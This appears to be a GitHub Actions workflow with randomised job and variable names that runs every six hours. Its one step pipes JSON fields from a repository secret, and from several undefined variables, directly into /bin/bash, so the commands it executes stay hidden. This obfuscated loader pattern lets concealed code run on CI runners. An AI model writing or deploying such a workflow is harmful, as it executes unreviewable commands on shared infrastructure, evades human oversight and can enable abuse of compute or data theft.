name: lanxingjian6543

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lanxingjian6543
        env:
          nvh97: ${{ secrets.nvh97 }}
        run: |
          echo $nvh97 | jq -r .vgliv1 | /bin/bash
          echo $d356 | jq -r .nigt3 | /bin/bash
          echo $f5722 | jq -r .labpl9480 | /bin/bash
          echo $j3 | jq -r .ku7 | /bin/bash

